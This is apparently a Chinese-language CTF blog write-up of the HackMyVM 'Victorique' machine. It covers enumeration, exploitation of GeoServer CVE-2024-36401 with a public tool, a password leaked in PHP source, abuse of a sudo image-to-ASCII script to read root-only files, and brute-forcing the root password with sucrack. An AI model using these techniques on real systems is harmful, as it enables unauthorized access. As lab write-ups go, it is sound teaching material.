HackMyVM-Victorique

もう二度と戻れないの？
ここは始まりか、終わりか

信息收集

./rustscan -a 192.168.56.106
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.106:22
Open 192.168.56.106:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-08 19:14 EST
Initiating ARP Ping Scan at 19:14
Scanning 192.168.56.106 [1 port]
Completed ARP Ping Scan at 19:14, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:14
Completed Parallel DNS resolution of 1 host. at 19:14, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:14
Scanning 192.168.56.106 [2 ports]
Discovered open port 22/tcp on 192.168.56.106
Discovered open port 80/tcp on 192.168.56.106
Completed SYN Stealth Scan at 19:14, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.56.106
Host is up, received arp-response (0.0010s latency).
Scanned at 2026-01-08 19:14:52 EST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:7C:51:17 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

访问80端口，发现要我们添加域名victorique.xyz。

添加完之后是个前端界面。

常规的目录爆破和子域名爆破

┌──(root㉿kali)-[/home/kali/Desktop]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://victorique.xyz/ --append-domain -t 25 | grep -v "301"
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       http://victorique.xyz/
[+] Method:                    GET
[+] Threads:                   25
[+] Wordlist:                  /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:                gobuster/3.8
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
gifts.victorique.xyz Status: 200 [Size: 8367]
#www.victorique.xyz Status: 400 [Size: 299]
#mail.victorique.xyz Status: 400 [Size: 299]
#smtp.victorique.xyz Status: 400 [Size: 299]
#pop3.victorique.xyz Status: 400 [Size: 299]
===============================================================
Finished
===============================================================

发现另外一个域名，查看后给了一个用户和密码

┌──(root㉿kali)-[/home/kali/Desktop]
└─# feroxbuster -u http://victorique.xyz/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -x php,zip,txt,html,htm --scan-dir-listings  -C 503
                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://victorique.xyz/
 🚩  In-Scope Url          │ victorique.xyz
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [503]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 📂  Scan Dir Listings     │ true
 💲  Extensions            │ [php, zip, txt, html, htm]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      196l      628w     8326c http://victorique.xyz/index
200      GET      102l      396w     4980c http://victorique.xyz/library
200      GET      151l      472w     7209c http://victorique.xyz/profile
301      GET        9l       28w      316c http://victorique.xyz/image => http://victorique.xyz/image/
200      GET     1914l    11013w   828758c http://victorique.xyz/image/vtr.png
200      GET      306l      820w    10959c http://victorique.xyz/login
200      GET      196l      628w     8326c http://victorique.xyz/
[####################] - 23m  1323330/1323330 0s      found:7       errors:0      
[####################] - 23m  1323270/1323270 967/s   http://victorique.xyz/ 
[####################] - 23m  1323270/1323270 960/s   http://victorique.xyz/image/

同时爆破的也出结果了，尝试用给的凭据登录，但失败，提示我们被骗了。

┌──(root㉿kali)-[/home/kali/Desktop]
└─# feroxbuster -u http://gifts.victorique.xyz/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt  -x php,zip,txt,html,htm --scan-dir-listings  -C 503
                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://gifts.victorique.xyz/
 🚩  In-Scope Url          │ gifts.victorique.xyz
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [503]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 📂  Scan Dir Listings     │ true
 💲  Extensions            │ [php, zip, txt, html, htm]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      285c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      282c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      199l      650w     8367c http://gifts.victorique.xyz/
200      GET      199l      650w     8367c http://gifts.victorique.xyz/index.html
200      GET       57l      935w     9785c http://gifts.victorique.xyz/greatgifts.txt

不过子域名的目录爆破有结果。

（这里我以为这个才是真的密码，但是仍然登录不了，后来才知道是子域名）

添加到子域名后，发现是geoserver。

Getvictorique

找了一个利用工具打cve 2024 36401

netuseradministrator/Geoserver_gui_exp: Geoserver综合利用工具

成功弹回shell

Root

victorique@Victorique:~$ ls -al
total 140
drwxr-xr-x  4 victorique victorique   4096 Dec 12 21:35 .
drwxr-xr-x  3 root       root         4096 Dec 12 04:55 ..
lrwxrwxrwx  1 root       root            9 Dec 12 02:36 .bash_history -> /dev/null
-rw-r--r--  1 victorique victorique    220 Apr 18  2019 .bash_logout
-rw-r--r--  1 victorique victorique   3526 Apr 18  2019 .bashrc
drwxr-xr-x 12 victorique victorique   4096 Dec 12 00:21 Geo
-rw-r--r--  1 root       root          149 Dec 12 21:35 hint.txt
-rwx------  1 root       root       105918 Dec 12 04:08 .kagura.png
drwxr-xr-x  2 victorique victorique   4096 Dec 12 21:36 .oracle_jre_usage
-rw-r--r--  1 victorique victorique    807 Apr 18  2019 .profile
-rw-r--r--  1 root       root           33 Dec 12 02:40 user.txt

victorique@Victorique:~$ cat hint.txt 
Found some useful fragments. Converted them into a visual representation.

                                                         --Cordelia Gallo

家目录下有些文件很可疑，有个png图片仅允许root查看。

信息收集，在网站目录下找到了用户victorique的密码

victorique@Victorique:/var/www/html$ ls
image  index.html  IoIooIIOIOio  library.html  login.php  profile.html
victorique@Victorique:/var/www/html$ cat login.php 
<?php
// 如果是 POST 请求，处理登录验证逻辑
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // 获取 JSON 输入
    $json = file_get_contents('php://input');
    $data = json_decode($json, true);

    $username = $data['username'] ?? '';
    $password = $data['password'] ?? '';

    // 设置响应头为 JSON
    header('Content-Type: application/json');

    // 验证逻辑 (在服务器端执行，前端不可见)
    // 用户 victorique 的密码,User victorique's Password: shinigami_qujo
    if ($username === 'ookami' && $password === 'GoS1Ck') {
        echo json_encode([
            'status' => 'success',
            'msgEn' => '"The cunning gray wolf has deceived you. The gift lies deeper."',
            'msgJp' => '「狡猾な灰色の狼はあなたを欺いた。贈り物はもっと深くにある。」'
        ]);
    } else {
        echo json_encode([
            'status' => 'fail',
            'msgEn' => 'Access Denied: The chaotic fragments reject you.',
            'msgJp' => 'アクセス拒否：混沌の欠片があなたを拒絶しています。'
        ]);
    }
    // 结束执行，防止输出 HTML
    exit;

victorique@Victorique:/var/www/html$ sudo -l
[sudo] password for victorique: 
Matching Defaults entries for victorique on Victorique:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User victorique may run the following commands on Victorique:
    (ALL) /usr/bin/python3 /opt/img2txt.py *

发现可以免密执行这个东西。

victorique@Victorique:~$ cat /opt/img2txt.py 
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import argparse

import cv2
import numpy as np


def get_args():
    parser = argparse.ArgumentParser("Image to ASCII")
    parser.add_argument("--input", type=str, default="data/input.jpg", help="Path to input image")
    parser.add_argument("--output", type=str, default="data/output.txt", help="Path to output text file")
    parser.add_argument("--mode", type=str, default="complex", choices=["simple", "complex"],
                        help="10 or 70 different characters")
    parser.add_argument("--num_cols", type=int, default=150, help="number of character for output's width")
    args = parser.parse_args()
    return args


def main(opt):
    if opt.mode == "simple":
        CHAR_LIST = '@%#*+=-:. '
    else:
        CHAR_LIST = "$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\|()1{}[]?-_+~<>i!lI;:,\"^`'. "
    num_chars = len(CHAR_LIST)
    num_cols = opt.num_cols
    image = cv2.imread(opt.input)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    height, width = image.shape
    cell_width = width / opt.num_cols
    cell_height = 2 * cell_width
    num_rows = int(height / cell_height)
    if num_cols > width or num_rows > height:
        print("Too many columns or rows. Use default setting")
        cell_width = 6
        cell_height = 12
        num_cols = int(width / cell_width)
        num_rows = int(height / cell_height)

    output_file = open(opt.output, 'w')
    for i in range(num_rows):
        for j in range(num_cols):
            output_file.write(
                CHAR_LIST[min(int(np.mean(image[int(i * cell_height):min(int((i + 1) * cell_height), height),
                                          int(j * cell_width):min(int((j + 1) * cell_width),
                                                                  width)]) * num_chars / 255), num_chars - 1)])
        output_file.write("\n")
    output_file.close()


if __name__ == '__main__':
    opt = get_args()
    main(opt)

这段代码的功能是将图片转换为字符画，结合hint.txt,提示我们寻找碎片，应该还有其他几张图片

victorique@Victorique:~$ find / -type f -name ".*.png" 2>/dev/null
/home/victorique/.kagura.png
/opt/.kujo.png
/etc/ssh/.shinigami.png
/var/www/html/.victorique.png

victorique@Victorique:~$ ls -al /opt/.kujo.png
-rwx------ 1 root root 70668 Dec 12 04:54 /opt/.kujo.png
victorique@Victorique:~$ ls -al //etc/ssh/.shinigami.png
-rwx------ 1 root root 5161 Dec 12 20:35 //etc/ssh/.shinigami.png
victorique@Victorique:~$ ls -al/var/www/html/.victorique.png
ls: invalid option -- '/'
Try 'ls --help' for more information.
victorique@Victorique:~$ ls -al /var/www/html/.victorique.png
-rwx------ 1 root root 113801 Dec 12 04:08 /var/www/html/.victorique.png
victorique@Victorique:~$

但是这里我发现几张图片根本没用，而且图片格式不限于png(一共有三种形式，png，webp，ppm),继续寻找

1	`sudo /usr/bin/python3 /opt/img2txt.py --input /usr/games/.haru.ppm --output 1.txt --mode simple`

第一块碎片，来源：/etc/ssh/.shinigami.png

第二块碎片，来源：/var/www/html/IoIooIIOIOio/sunset.webp

第三块碎片，来源：/usr/games/.haru.ppm

之后对这些碎片字符画进行排列组合，得到如下字典

C11pp3r510n5h1pch4mp
C11pp3r5ch4mp10n5h1p
10n5h1pC11pp3r5ch4mp
10n5h1pch4mpC11pp3r5
ch4mpC11pp3r510n5h1p
ch4mp10n5h1pC11pp3r5

爆破得到root密码

victorique@Victorique:~$ ./sucrack -u root -w 20 2.txt 
password is: C11pp3r5ch4mp10n5h1p
root@Victorique:~# ls
root.png

这里flag也是png，也可以用刚刚的脚本转换，不过我嫌麻烦直接传到攻击机上打开了。

#HMV

HackMyVM-Victorique

http://example.com/2026/01/09/HackMyVM-Victorique/

Author

Skyarrow

Posted on

January 9, 2026

Licensed under

一个能自动填写HMV用户名和密码的油猴脚本 Previous

一些提权的小tricks Next